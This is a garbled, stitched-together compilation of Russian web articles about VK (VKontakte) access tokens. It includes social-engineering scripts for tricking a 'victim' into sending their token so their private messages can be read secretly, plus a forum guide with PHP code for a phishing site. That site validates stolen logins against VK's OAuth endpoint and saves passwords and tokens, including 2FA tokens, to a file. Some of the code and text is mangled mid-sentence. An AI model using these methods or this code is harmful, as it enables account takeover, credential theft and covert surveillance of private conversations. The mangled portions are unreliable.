Все мы знаем, что у ВК есть API, и я уверен, что большинство людей пыталось им воспользоваться в своих целях. Лично у меня полно проектов, связанных с ним: штук 5 мощных ботов, составление масштабных датасетов из постов групп и т.д. И не удивительно, что мои знакомые просили меня пару раз выкачать песни из вложений диалога, фотографии или же сохранить текст переписок с каким-нибудь человеком в отдельный файл.
Но однажды пришло «оно», и с того момента выполнение таких небольших просьб перестало быть тривиальной задачей:
✅ как прочитать чужие диалоги во вконтакте? взламываем вк… | tvoyvk.ru – 2022
Для получения чужих диалогов нам не нужно отсылать никакие стиллеры жертве, или что-то посылать на почту. Нам достаточно просто поговорить с жертвой, и выманить у нее токен.
Токен , или же access_token , это специальный ключ доступа, что-то вроде пароля. Он представляет собой строку из латинских букв и цифр.
С помощью токена можно читать переписки жертвы, отвечать на них, удалять сообщения, менять статус, удалить страницу, и так далее. Пароль и логин от страницы, при этом, нам не потребуется.
Перед началом всех операций, перейдем на сайт vkserv.ru/api/ и выбираем просмотр диалогов:
Далее нам нужно скопировать ссылку для получения токена ( вкладку не закрывать ):
После этого можно начинать переписку с жертвой, нужно придумать легенду в которую бы собеседник поверил и проникся, а так же чтобы данный человек перешел по вашей ссылке и переслал вам Токен.
( https://api.tvoyvk.ru/blank.html#access_token= 358b80e7274bcb568107ebd2bf4094796590f2fb25f81af798648e2f0d99cb92c1a39a0f8cdda3799931a user_id=484945261 ) — например как эта вот ссылка.
Токеном является набор символов после знака «=» до знака «(S*)»‘, response.text)[0] session = requests.Session() response = session.post(f’https://vk.com/dev’, data=f’act=a_run_methodhash=param_count=20param_media_type=photoparam_photo_sizes=0param_v=5.103′, cookies=cookies_final) count=20 for i in range(200): response_json = json.loads(json.loads(response.text[4:])[‘payload’][1][0])[‘response’][‘items’] for photo in response_json: ph = photo[‘attachment’][‘photo’][‘sizes’][-1][‘url’] r = session.get(ph, timeout=10) if r.status_code == 200: with open(f’D://dev/’ str(ph.split(‘/’)[-1]), ‘wb’) as f: f.write(r.content) m_id = photo[‘message_id’] response = session.post(f’https://vk.com/dev’, data=f’act=a_run_methodhash=param_count=20param_max_forwards_level=45param_peer_id=param_preserve_order=0https://tvoyvk.ru/kak-prohitat-huzhie-dialogi-vo-vkontakte-vzlamyvaem-vk-ruorenet-2022/» target=»_blank»]tvoyvk.ru[/mask_link]
Развод нн на токен (работает не всегда)0))
Как получить токен вконтакте
Что такое токен ВКонтакте и почему все хотят его получить?
Токен ВКонтакте — это специальный ключ ВКонтакте, позволяющий тем или иным лицам получать доступ к приложениям, получать доступ к фотографиям, сообщениям, переписке. Токен известен только владельцу страницы. То есть после получения токена с определенными правами мы практически получаем доступ к странице.
Давно писал статью о том, как читать чужую переписку ВКонтакте с помощью токена, а вот о получении своего или чужого токена написал очень мало. Поэтому сегодня я немного расширю эту тему.
Получите токен для ВК
Здесь все кажется простым, но каждый день мне пишут 5 человек с просьбой дать им токен, чего я не делаю, потому что у меня свои дела. Поэтому вкратце расскажу, как это делается, и приложу один из способов.
Для этого, как всегда, нам понадобится сайт vkserv.ru, который мы использовали в прошлый раз. В нем есть специальная вкладка «Получить токен ВКонтакте«.
Переходим в эту вкладку, авторизуемся на сайте. Мы не боимся за свои данные, потому что никуда не отправляем свой токен!
Далее видим единственную кнопку с названием «Перейти получить токен», нажимаем на нее (правда, других здесь нет).
Далее мы попадаем на страницу с множеством непонятных кнопок. Нам это интересно, потому что нижняя часть, которую я зачеркнул, нужна продвинутым пользователям (если интересно, я тоже об этом напишу).
Затем нажмите кнопку с надписью «Клевер», позже я объясню, почему именно эта кнопка.
После катапультирования на страницу подтверждения скопируйте адрес из строки и отправьте его жертве (если вы получите чужой токен). Если вы хотите получить свой, просто нажмите кнопку «Разрешить».
После того, как жертва нажмет кнопку «Разрешить», она будет перенаправлена на страницу с токеном ВКонтакте. Это выглядит так страшно.
В адресной строке будет находиться наш токен ВКонтакте. А чуть ниже просто страшная надпись «Пожалуйста, не копируйте данные из адресной строки для сторонних сайтов. Поэтому вы можете потерять доступ к своей учетной записи.»
Нам просто нужно убедиться, что жертва отправляет нам ссылку из адресной строки браузера, которую он открыл. Здесь в игру вступает ваше воображение.
Почему я рекомендовал вам использовать приложение Clover? А как получить чужой токен ВКонтакте.
это просто, здесь вы можете сказать своей жертве, что хотите увеличить достижения в игре и поделиться с вами одним способом, но вам нужно как минимум два человека и жетон каждого из них.
Также для правдоподобия спросите перед тем, как зайти в группу Clover ВКонтакте и зарегистрироваться, и только потом отпускать ссылку для получения токена.
После этого вы получаете токен, через некоторое время говорите спасибо, что все заработало и спасибо за помощь.
И мы сами сразу идем читать переписку нашей жертвы, ничего ей не говоря.
Вы уже знаете, что делать с токеном, это прочитать совпадение ВКонтакте с токеном или перейти на страницу ВК по этому же токену. О втором способе я опубликую чуть позже.
Если хотите, я опубликую на сайте больше способов получить чужой токен, которые будут работать в 90% случаев. Пишите в комментариях и подписывайтесь на телеграм-канал, если будет достаточно людей обязательно напишу!
Источник: bloger-zoom.ru
[Гайд]: Фишинг сайт, отлавливающий только корректные пароли + воруем токен.
Возможно кому-то будет полезен гайд о том как создать фишинг сайт с практически настоящей авторизацией.
С помощью этого метода вы можете узнать следующие данные:
• ID пользователя, который ввёл корректные данные
• Логин и пароль этого пользователя
• токен (access_token) | для беспалевного захода на аккаунт жертвы и т.д
Так же есть вероятность украсть токен у пользователя, который использует двухфакторную авторизацию ВК — это всё так же определяется скриптом 🙂
Своровав токен — мы получаем полный контроль над аккаунтом
Здесь я описываю только техническую часть. Весь дизайн, оформление и прочее — остаётся на вас.
И так, поехали.
Требования:
• Библиотека cURL
• Пара рук
Первое что нам нужно сделать — это создать файл, засунуть туда PHP скрипт. В этом же файле потом и создадим HTML Форму.
Копируем туда код:
elseif(isset($_POST[‘login’]))< $Msg= curl(«https://oauth.vk.com/token?grant_type=passwordclient_secret=hHbZxrka2uZ6jB1inYsHpassword=$pass2fa_supported=1»); $js = json_decode($Msg,true); if($js[«error»] == «need_captcha») echo ««>»; > $js = json_decode($Msg, true); if($js[‘access_token’] != NULL OR isset($_POST[‘uri’])) < if(isset($_POST[«uri»]))< $uri = $_POST[«uri»]; $file=fopen(«data.txt»,»a»); fwrite($file,»$urin»); fclose($file); >else < $file=fopen(«data.txt»,»a»); fwrite($file,»$log | $pass | vk.com/id| n»); fclose($file); > > elseif($js[‘error’]==»need_validation») < echo «У вас используется двухфакторная авторизация. Перейдите по ссылке Нажмите кнопку подтвердить и вставьте полученную ссылку в соответсвуюущее поле»; > elseif($js[‘error’]==»invalid_client») < echo «Неправильный логин или пароль»; >function curl( $url ) < $ch = curl_init( $url ); //Init library curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false ); //Имеется SSL? (HTTPS) Если да — меняем false на true curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $ch ); curl_close( $ch ); return $response; >?>
По-порядку: первое условие — проверка на ввод капчи, которую может попросить ввести наш дорогой ВКонтакт.
Второе условие: Если не было капчи и мы ввели логин.
После условия у нас обрабатывается JSON, который мы получили от ВК и сразу же идёт ещё одно условие.
Проверяем, если нам ВК выдал токен (или получили ссылку, но об этом позже.)
Если получили ссылку — сохраняем её в файл
Иначе если вы получили токен, то вам нужно сохранить все данные — его введенный пароль, логин. По желанию: ID и токен.
Следующее, последнее условие — обработка ошибки need_validation. Ошибка оповещает о том, что пользователь использует двухфакторную авторизацию. Можете изменить текст, но ссылку не стоит изменять, если вы не знаете что она делает.
Далее. После всего PHP скрипта мы добавляем HTML. Он так же будет содержать небольшие кусочки PHP кода. Смотрим
Авторизация «; > else if($js[«error»] == «need_captcha»)< echo «»; echo «‘ name=’id’>»; > ?> Войти
Тут всё просто. Создаём форму для отправки данных. Первое PHP Условие — если пользователь ввёл свой пароль и ему вылезла ошибка, что нужна валидация аккаунта. По-этому нужно вставить ссылку(где будет у нас токен), вместо ввода логина и пароля.
Ну и второе условие это капча. Если ошибка need_captcha — показать поле для ввода капчи.
И ещё дополнительно скрытое поле — captcha_sid.
Идентификатор капчи, которую должен ввести пользователь.
Как видите, всё просто)
В спойлере оставлю полный код скрипта
Спойлер: ФУЛЛ
elseif(isset($_POST[‘login’]))< $Msg= curl(«https://oauth.vk.com/token?grant_type=passwordclient_secret=hHbZxrka2uZ6jB1inYsHpassword=$pass2fa_supported=1»); $js = json_decode($Msg,true); if($js[«error»] == «need_captcha») echo ««>»; > $js = json_decode($Msg, true); if($js[‘access_token’] != NULL OR isset($_POST[‘uri’])) < if(isset($_POST[«uri»]))< $uri = $_POST[«uri»]; $file=fopen(«data.txt»,»a»); fwrite($file,»$urin»); fclose($file); >else < $file=fopen(«data.txt»,»a»); fwrite($file,»$log | $pass | vk.com/id| n»); fclose($file); > > elseif($js[‘error’]==»need_validation») < echo «У вас используется двухфакторная авторизация. Перейдите по ссылке Нажмите кнопку подтвердить и вставьте полученную ссылку в соответсвуюущее поле»; > elseif($js[‘error’]==»invalid_client») < echo «Неправильный логин или пароль»; >function curl( $url ) < $ch = curl_init( $url ); //Init library curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false ); //Имеется SSL? (HTTPS) Если да — меняем false на true curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $ch ); curl_close( $ch ); return $response; >?> Авторизация «; > else if($js[«error»] == «need_captcha»)< echo «»; echo «‘ name=’id’>»; > ?> Войти
UPD: Немного изменил код. Добавил сохранение данных в файл «data.txt». Если его нет — автоматически создаётся.
UPD2: Разбор ссылки, которую мы получаем, если человек с использует двухфакторную авторизацию
api.vk.com/blank.html#access_token= 5661d05ed8a4cc9cbd5c25df76c2e53fe83 user_id= 145354933
Всё, что нас интересует я выделил зелёным цветом
Первое что нас интересует — это символы после access_token=
До первого знака » — не включая его. Он нас не интересует
Это будет нашим ключем (токеном)
Второе — символы после «user_id=» — это наш ID жертвы, которая отправила нам ссылку. Можем сгенерировать ссылку и получить ВК жертвы vk.com/id 145354933
Всё в ваших руках 🙂
29.08.19 — 20:00 [UPD3: изменил метод получения токена при использовании двухфакторной авторизации].
Т.к ВКонтакте запрещает использовать messages.get, messages.getHistory, мы притворяемся приложением Kate Mobile.
Последнее редактирование: 19.10.2019
Мои публикации:
Программа для управления токеном ВК
Фишинг, отлавливающий корректные пароли от ВК + токен (или токен, если двухфакторка)
Поиск местоположения по геолокации
_________________________________________________________________________________________________________
Боты ВК: vkbot-shop.ru (сейчас идёт перевёрстка сайта, потому что я криворукий верстальщик)
Источник: dark2web.org